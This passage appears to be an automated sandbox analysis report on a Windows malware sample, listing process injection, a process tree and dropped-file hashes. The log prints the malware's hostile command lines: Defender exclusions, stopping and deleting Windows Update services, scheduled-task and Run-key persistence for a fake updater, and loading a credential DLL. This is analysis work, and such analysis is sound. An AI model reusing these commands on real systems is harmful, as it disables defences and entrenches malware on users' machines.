Token: SeSecurityPrivilege | 4800 | powershell.exe
Token: SeTakeOwnershipPrivilege | 4800 | powershell.exe
Token: SeLoadDriverPrivilege | 4800 | powershell.exe
Token: SeSystemProfilePrivilege | 4800 | powershell.exe
Token: SeSystemtimePrivilege | 4800 | powershell.exe
Token: SeProfSingleProcessPrivilege | 4800 | powershell.exe
Suspicious use of FindShellTrayWindow 1 IoC
Processes:
pid | process
3380 | rundll32.exe
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
pid | process
2596 | Explorer.EXE
2596 | Explorer.EXE
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
description | pid | process | target process
PID 984 wrote to memory of 1932 | 984 | 83baf716c50b90d398e1285d0c8c04c8.exe | Player3.exe
PID 984 wrote to memory of 1932 | 984 | 83baf716c50b90d398e1285d0c8c04c8.exe | Player3.exe
PID 984 wrote to memory of 1932 | 984 | 83baf716c50b90d398e1285d0c8c04c8.exe | Player3.exe
PID 984 wrote to memory of 804 | 984 | 83baf716c50b90d398e1285d0c8c04c8.exe | pb1111.exe
PID 984 wrote to memory of 804 | 984 | 83baf716c50b90d398e1285d0c8c04c8.exe | pb1111.exe
PID 984 wrote to memory of 3708 | 984 | 83baf716c50b90d398e1285d0c8c04c8.exe | ddli.exe
PID 984 wrote to memory of 3708 | 984 | 83baf716c50b90d398e1285d0c8c04c8.exe | ddli.exe
PID 984 wrote to memory of 3708 | 984 | 83baf716c50b90d398e1285d0c8c04c8.exe | ddli.exe
PID 1932 wrote to memory of 3984 | 1932 | Player3.exe | nbveek.exe
PID 1932 wrote to memory of 3984 | 1932 | Player3.exe | nbveek.exe
PID 1932 wrote to memory of 3984 | 1932 | Player3.exe | nbveek.exe
PID 984 wrote to memory of 5004 | 984 | 83baf716c50b90d398e1285d0c8c04c8.exe | birges.exe
PID 984 wrote to memory of 5004 | 984 | 83baf716c50b90d398e1285d0c8c04c8.exe | birges.exe
PID 3984 wrote to memory of 1068 | 3984 | nbveek.exe | schtasks.exe
PID 3984 wrote to memory of 1068 | 3984 | nbveek.exe | schtasks.exe
PID 3984 wrote to memory of 1068 | 3984 | nbveek.exe | schtasks.exe
PID 3984 wrote to memory of 4948 | 3984 | nbveek.exe | cmd.exe
PID 3984 wrote to memory of 4948 | 3984 | nbveek.exe | cmd.exe
PID 3984 wrote to memory of 4948 | 3984 | nbveek.exe | cmd.exe
PID 3708 wrote to memory of 4528 | 3708 | ddli.exe | ddli.exe
PID 3708 wrote to memory of 4528 | 3708 | ddli.exe | ddli.exe
PID 3708 wrote to memory of 4528 | 3708 | ddli.exe | ddli.exe
PID 4948 wrote to memory of 2300 | 4948 | cmd.exe | cmd.exe
PID 4948 wrote to memory of 2300 | 4948 | cmd.exe | cmd.exe
PID 4948 wrote to memory of 2300 | 4948 | cmd.exe | cmd.exe
PID 4948 wrote to memory of 3380 | 4948 | cmd.exe | cacls.exe
PID 4948 wrote to memory of 3380 | 4948 | cmd.exe | cacls.exe
PID 4948 wrote to memory of 3380 | 4948 | cmd.exe | cacls.exe
PID 4948 wrote to memory of 1796 | 4948 | cmd.exe | cacls.exe
PID 4948 wrote to memory of 1796 | 4948 | cmd.exe | cacls.exe
PID 4948 wrote to memory of 1796 | 4948 | cmd.exe | cacls.exe
PID 4948 wrote to memory of 4732 | 4948 | cmd.exe | cmd.exe
PID 4948 wrote to memory of 4732 | 4948 | cmd.exe | cmd.exe
PID 4948 wrote to memory of 4732 | 4948 | cmd.exe | cmd.exe
PID 4948 wrote to memory of 3172 | 4948 | cmd.exe | cacls.exe
PID 4948 wrote to memory of 3172 | 4948 | cmd.exe | cacls.exe
PID 4948 wrote to memory of 3172 | 4948 | cmd.exe | cacls.exe
PID 5004 wrote to memory of 3808 | 5004 | birges.exe | ngentask.exe
PID 5004 wrote to memory of 3808 | 5004 | birges.exe | ngentask.exe
PID 4948 wrote to memory of 4612 | 4948 | cmd.exe | cacls.exe
PID 4948 wrote to memory of 4612 | 4948 | cmd.exe | cacls.exe
PID 4948 wrote to memory of 4612 | 4948 | cmd.exe | cacls.exe
PID 5004 wrote to memory of 4580 | 5004 | birges.exe | EdmGen.exe
PID 5004 wrote to memory of 4580 | 5004 | birges.exe | EdmGen.exe
PID 5004 wrote to memory of 5084 | 5004 | birges.exe | aspnet_state.exe
PID 5004 wrote to memory of 5084 | 5004 | birges.exe | aspnet_state.exe
PID 5004 wrote to memory of 1760 | 5004 | birges.exe | aspnet_regsql.exe
PID 5004 wrote to memory of 1760 | 5004 | birges.exe | aspnet_regsql.exe
PID 5004 wrote to memory of 2492 | 5004 | birges.exe | cvtres.exe
PID 5004 wrote to memory of 2492 | 5004 | birges.exe | cvtres.exe
PID 5004 wrote to memory of 4432 | 5004 | birges.exe | mscorsvw.exe
PID 5004 wrote to memory of 4432 | 5004 | birges.exe | mscorsvw.exe
PID 5004 wrote to memory of 1856 | 5004 | birges.exe | SMSvcHost.exe
PID 5004 wrote to memory of 1856 | 5004 | birges.exe | SMSvcHost.exe
PID 5004 wrote to memory of 4376 | 5004 | birges.exe | AppLaunch.exe
PID 5004 wrote to memory of 4376 | 5004 | birges.exe | AppLaunch.exe
PID 5004 wrote to memory of 1872 | 5004 | birges.exe | Microsoft.Workflow.Compiler.exe
PID 5004 wrote to memory of 1872 | 5004 | birges.exe | Microsoft.Workflow.Compiler.exe
PID 5004 wrote to memory of 4992 | 5004 | birges.exe | MSBuild.exe
PID 5004 wrote to memory of 4992 | 5004 | birges.exe | MSBuild.exe
PID 5004 wrote to memory of 4456 | 5004 | birges.exe | AddInProcess.exe
PID 5004 wrote to memory of 4456 | 5004 | birges.exe | AddInProcess.exe
PID 5004 wrote to memory of 4420 | 5004 | birges.exe | DataSvcUtil.exe
PID 5004 wrote to memory of 4420 | 5004 | birges.exe | DataSvcUtil.exe
Processes
Process tree: the bracketed number is the nesting depth, indentation shows parent/child relations, and each node gives its image path, its command line and the signatures it triggered.

[1] C:\Windows\Explorer.EXE  cmdline: C:\Windows\Explorer.EXE
    - Modifies Internet Explorer settings
    - Modifies registry class
    - Suspicious behavior: AddClipboardFormatListener
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
  [2] C:\Users\Admin\AppData\Local\Temp\83baf716c50b90d398e1285d0c8c04c8.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\83baf716c50b90d398e1285d0c8c04c8.exe"
      - Checks computer location settings
      - Suspicious use of WriteProcessMemory
    [3] C:\Users\Admin\AppData\Local\Temp\Player3.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\Player3.exe"
        - Executes dropped EXE
        - Checks computer location settings
        - Suspicious use of WriteProcessMemory
      [4] C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe"
          - Executes dropped EXE
          - Checks computer location settings
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\SysWOW64\schtasks.exe  cmdline: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe" /F
            - Creates scheduled task(s)
        [5] C:\Windows\SysWOW64\cmd.exe  cmdline: "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nbveek.exe" /P "Admin:N"&&CACLS "nbveek.exe" /P "Admin:R" /E&&echo Y|CACLS "..\16de06bfb4" /P "Admin:N"&&CACLS "..\16de06bfb4" /P "Admin:R" /E&&Exit
            - Suspicious use of WriteProcessMemory
          [6] C:\Windows\SysWOW64\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          [6] C:\Windows\SysWOW64\cacls.exe  cmdline: CACLS "nbveek.exe" /P "Admin:N"
          [6] C:\Windows\SysWOW64\cacls.exe  cmdline: CACLS "nbveek.exe" /P "Admin:R" /E
          [6] C:\Windows\SysWOW64\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          [6] C:\Windows\SysWOW64\cacls.exe  cmdline: CACLS "..\16de06bfb4" /P "Admin:N"
          [6] C:\Windows\SysWOW64\cacls.exe  cmdline: CACLS "..\16de06bfb4" /P "Admin:R" /E
        [5] C:\Users\Admin\AppData\Local\Temp\1000089001\pb1111.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\1000089001\pb1111.exe"
            - Executes dropped EXE
        [5] C:\Users\Admin\AppData\Local\Temp\1000090001\random.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\1000090001\random.exe"
            - Executes dropped EXE
            - Checks computer location settings
          [6] C:\Users\Admin\AppData\Local\Temp\1000090001\random.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\1000090001\random.exe" -h
              - Executes dropped EXE
        [5] C:\Users\Admin\AppData\Local\Temp\1000091001\XandETC.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\1000091001\XandETC.exe"
            - Suspicious use of NtCreateUserProcessOtherParentProcess
            - Executes dropped EXE
            - Drops file in Program Files directory
        [5] C:\Users\Admin\AppData\Local\Temp\1000092001\ChromeSetup.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\1000092001\ChromeSetup.exe"
            - Executes dropped EXE
            - Checks SCSI registry key(s)
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious behavior: MapViewOfSection
        [5] C:\Windows\SysWOW64\rundll32.exe  cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dll, Main
            - Loads dropped DLL
          [6] C:\Windows\system32\rundll32.exe  cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dll, Main
              - Loads dropped DLL
            [7] C:\Windows\system32\WerFault.exe  cmdline: C:\Windows\system32\WerFault.exe -u -p 2116 -s 692
                - Program crash
    [3] C:\Users\Admin\AppData\Local\Temp\pb1111.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\pb1111.exe"
        - Executes dropped EXE
    [3] C:\Users\Admin\AppData\Local\Temp\ddli.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\ddli.exe"
        - Executes dropped EXE
        - Checks computer location settings
        - Suspicious use of WriteProcessMemory
      [4] C:\Users\Admin\AppData\Local\Temp\ddli.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\ddli.exe" -h
          - Executes dropped EXE
    [3] C:\Users\Admin\AppData\Local\Temp\birges.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\birges.exe"
        - Executes dropped EXE
        - Suspicious use of SetThreadContext
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentask.exe  cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentask.exe"
      [4] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\EdmGen.exe  cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\EdmGen.exe"
      [4] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regsql.exe  cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regsql.exe"
      [4] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe  cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe"
      [4] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe  cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe"
      [4] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe  cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe"
      [4] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe  cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe"
      [4] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe  cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe"
      [4] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe  cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe"
      [4] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe  cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe"
      [4] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe  cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe"
      [4] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\DataSvcUtil.exe  cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\DataSvcUtil.exe"
      [4] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\WsatConfig.exe  cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\WsatConfig.exe"
      [4] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe  cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe"
  [2] C:\Users\Admin\AppData\Local\Temp\8D9A.exe  cmdline: C:\Users\Admin\AppData\Local\Temp\8D9A.exe
      - Executes dropped EXE
    [3] C:\Windows\SysWOW64\rundll32.exe  cmdline: C:\Windows\system32\rundll32.exe C:\Users\Admin\AppData\Local\Temp\Eorppuwwrieiyod.dll,start
        - Blocklisted process makes network request
        - Loads dropped DLL
        - Suspicious use of SetThreadContext
        - Checks processor information in registry
      [4] C:\Windows\system32\rundll32.exe  cmdline: "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61 23736
          - Modifies registry class
          - Suspicious use of FindShellTrayWindow
    [3] C:\Windows\SysWOW64\WerFault.exe  cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2564 -s 400
        - Program crash
  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
      - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\System32\cmd.exe  cmdline: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    [3] C:\Windows\System32\sc.exe  cmdline: sc stop UsoSvc
        - Launches sc.exe
    [3] C:\Windows\System32\sc.exe  cmdline: sc stop WaaSMedicSvc
        - Launches sc.exe
    [3] C:\Windows\System32\sc.exe  cmdline: sc stop wuauserv
        - Launches sc.exe
    [3] C:\Windows\System32\sc.exe  cmdline: sc stop bits
        - Launches sc.exe
    [3] C:\Windows\System32\sc.exe  cmdline: sc stop dosvc
        - Launches sc.exe
    [3] C:\Windows\System32\reg.exe  cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    [3] C:\Windows\System32\reg.exe  cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
    [3] C:\Windows\System32\reg.exe  cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
        - Modifies security service
    [3] C:\Windows\System32\reg.exe  cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
    [3] C:\Windows\System32\reg.exe  cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  [2] C:\Windows\System32\cmd.exe  cmdline: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
    [3] C:\Windows\System32\powercfg.exe  cmdline: powercfg /x -hibernate-timeout-ac 0
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\System32\powercfg.exe  cmdline: powercfg /x -hibernate-timeout-dc 0
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\System32\powercfg.exe  cmdline: powercfg /x -standby-timeout-ac 0
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\System32\powercfg.exe  cmdline: powercfg /x -standby-timeout-dc 0
        - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }
      - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#iqegjinl#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "NoteUpdateTaskMachineQC" } Else { "C:\Program Files\Notepad\Chrome\updater.exe" }
    [3] C:\Windows\system32\schtasks.exe  cmdline: "C:\Windows\system32\schtasks.exe" /run /tn NoteUpdateTaskMachineQC
  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
      - Drops file in System32 directory
      - Modifies data under HKEY_USERS
  [2] C:\Windows\System32\cmd.exe  cmdline: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    [3] C:\Windows\System32\sc.exe  cmdline: sc stop UsoSvc
        - Launches sc.exe
    [3] C:\Windows\System32\sc.exe  cmdline: sc stop WaaSMedicSvc
        - Launches sc.exe
    [3] C:\Windows\System32\sc.exe  cmdline: sc stop wuauserv
        - Launches sc.exe
    [3] C:\Windows\System32\sc.exe  cmdline: sc stop bits
        - Launches sc.exe
    [3] C:\Windows\System32\sc.exe  cmdline: sc stop dosvc
        - Launches sc.exe
    [3] C:\Windows\System32\reg.exe  cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    [3] C:\Windows\System32\reg.exe  cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
    [3] C:\Windows\System32\reg.exe  cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
    [3] C:\Windows\System32\reg.exe  cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
    [3] C:\Windows\System32\reg.exe  cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  [2] C:\Windows\System32\cmd.exe  cmdline: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
    [3] C:\Windows\System32\powercfg.exe  cmdline: powercfg /x -hibernate-timeout-dc 0
    [3] C:\Windows\System32\powercfg.exe  cmdline: powercfg /x -standby-timeout-ac 0
    [3] C:\Windows\System32\powercfg.exe  cmdline: powercfg /x -standby-timeout-dc 0
  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }
      - Drops file in System32 directory
      - Modifies data under HKEY_USERS
  [2] C:\Windows\System32\conhost.exe  cmdline: C:\Windows\System32\conhost.exe zuhwtyqtfkk
      - Suspicious use of NtCreateUserProcessOtherParentProcess
  [2] C:\Windows\System32\cmd.exe  cmdline: C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
      - Drops file in Program Files directory
    [3] C:\Windows\System32\Wbem\WMIC.exe  cmdline: wmic PATH Win32_VideoController GET Name, VideoProcessor
  [2] C:\Windows\System32\cmd.exe  cmdline: C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
      - Drops file in Program Files directory
  [2] C:\Windows\System32\conhost.exe  cmdline: C:\Windows\System32\conhost.exe ozascextlcafxrlv
      - Modifies data under HKEY_USERS
[1] C:\Windows\system32\rundll32.exe  cmdline: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
    - Process spawned unexpected child process
  [2] C:\Windows\SysWOW64\rundll32.exe  cmdline: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
      - Loads dropped DLL
    [3] C:\Windows\SysWOW64\WerFault.exe  cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4884 -s 600
        - Program crash
[1] C:\Windows\SysWOW64\WerFault.exe  cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4884 -ip 4884
[1] C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe  cmdline: C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe
    - Executes dropped EXE
[1] C:\Windows\system32\rundll32.exe  cmdline: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
    - Process spawned unexpected child process
  [2] C:\Windows\SysWOW64\rundll32.exe  cmdline: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
      - Loads dropped DLL
    [3] C:\Windows\SysWOW64\WerFault.exe  cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 832 -s 572
        - Program crash
[1] C:\Windows\SysWOW64\WerFault.exe  cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 832 -ip 832
[1] C:\Windows\system32\WerFault.exe  cmdline: C:\Windows\system32\WerFault.exe -pss -s 184 -p 2116 -ip 2116
[1] C:\Windows\SysWOW64\WerFault.exe  cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 2564 -ip 2564
[1] C:\Program Files\Notepad\Chrome\updater.exe  cmdline: "C:\Program Files\Notepad\Chrome\updater.exe"
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Drops file in Program Files directory
[1] C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe  cmdline: C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe
    - Executes dropped EXE
[1] C:\Windows\System32\rundll32.exe  cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
[1] C:\Windows\System32\powercfg.exe  cmdline: powercfg /x -hibernate-timeout-ac 0
Downloads
-
C:\Program Files\Google\Libs\g.logFilesize
226B
MD5fdba80d4081c28c65e32fff246dc46cb
SHA174f809dedd1fc46a3a63ac9904c80f0b817b3686
SHA256b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398
SHA512b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29
-
C:\Program Files\Notepad\Chrome\updater.exeFilesize
3.7MB
MD53006b49f3a30a80bb85074c279acc7df
SHA1728a7a867d13ad0034c29283939d94f0df6c19df
SHA256f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280
SHA512e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd
-
C:\Program Files\Notepad\Chrome\updater.exeFilesize
3.7MB
MD53006b49f3a30a80bb85074c279acc7df
SHA1728a7a867d13ad0034c29283939d94f0df6c19df
SHA256f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280
SHA512e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD5440cb38dbee06645cc8b74d51f6e5f71
SHA1d7e61da91dc4502e9ae83281b88c1e48584edb7c
SHA2568ef7a682dfd99ff5b7e9de0e1be43f0016d68695a43c33c028af2635cc15ecfe
SHA5123aab19578535e6ba0f6beb5690c87d970292100704209d2dcebddcdd46c6bead27588ef5d98729bfd50606a54cc1edf608b3d15bef42c13b9982aaaf15de7fd6
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD5359d1e37a264703c99ebd01eed362de5
SHA1a1122c8bf9848b3371cd191ba540864204d1d845
SHA2565781f3046b0d978469415a059cf5ceae0e532869e69ab1dffb8ed878bd299b07
SHA512ce3caa1d2205be8167b7cd48ebf538a9ce8c148643c26a20377894aa15cf00f90b2b5e2ebf35d40a0273c088abc11fe6f010e34691d7fbc4bef8d7e482f5087d
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5ba7cb450667ae5a5d0aa3c22fb67de4e
SHA19c79a1ba399162df82338195c90830d2cb2958c4
SHA2565f69208af4cb0214b67c4adf60890e7d9e01ee07d6365d511caf9938584d9ad0
SHA5126ddfb2ef606579c177d730b4d66671c4c66e19bf1a3faf485f34b5883d7319d1cf4e46d3f903a26732d6a9ce5c270e123fcf3085ec04000ec5a6d6d86a1a9404
-
C:\Users\Admin\AppData\Local\Temp\1000089001\pb1111.exeFilesize
3.5MB
MD517d8b23d0a991861f9a34ca2853bd267
SHA154325fa47d6423bef266ff925fdc22b65ae883cb
SHA25623b2cb63c39cad03761fa30d91e0d5a90df17aae5c3b7cbf3a2172d59824efe1
SHA5121c1fa7f991a5ab650c3279d56b9e1d3a77d623a568a15057c7b084f96e71e57047319a6a45e9f2e71767fadf8bf0bc647124b8b9ee03d9c63d250bd9f9c0764d
-
C:\Users\Admin\AppData\Local\Temp\1000089001\pb1111.exeFilesize
3.5MB
MD517d8b23d0a991861f9a34ca2853bd267
SHA154325fa47d6423bef266ff925fdc22b65ae883cb
SHA25623b2cb63c39cad03761fa30d91e0d5a90df17aae5c3b7cbf3a2172d59824efe1
SHA5121c1fa7f991a5ab650c3279d56b9e1d3a77d623a568a15057c7b084f96e71e57047319a6a45e9f2e71767fadf8bf0bc647124b8b9ee03d9c63d250bd9f9c0764d
-
C:\Users\Admin\AppData\Local\Temp\1000090001\random.exeFilesize
160KB
MD5b9363486500e209c05f97330226bbf8a
SHA1bfe2d0072d09b30ec66dee072dde4e7af26e4633
SHA25601138f2318e59e1fe59f1eb7de3859af815ebf9a59aae1084c1a97a99319ee35
